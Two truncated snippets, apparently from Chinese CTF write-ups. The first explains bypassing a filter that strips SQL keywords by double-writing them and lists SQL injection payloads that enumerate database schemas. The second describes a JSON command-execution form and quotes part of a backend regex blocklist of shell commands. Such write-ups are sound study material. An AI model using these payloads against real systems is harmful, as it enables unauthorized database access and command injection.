把关键函数（or/select/union等）给替换为空，可以利用双写绕过，其他都算常规操作。 1' union select 1,2,3# 1'%20ununionion%20seselectlect%201,2,3%23 1' union select 1,2,group_concat(schema_name)from information_schema.schemata# 1'%20uniunionon…

题目给的表单可以接收JSON格式的命令。比如{"cmd":"ls"} 接下来如果输入{"cmd":"cat index.php"}的话什么都不会返回。 这是因为后端中有匹配规则： <br/>'; } elseif (preg_match('/^.*(alias|bg|bind|…</br/>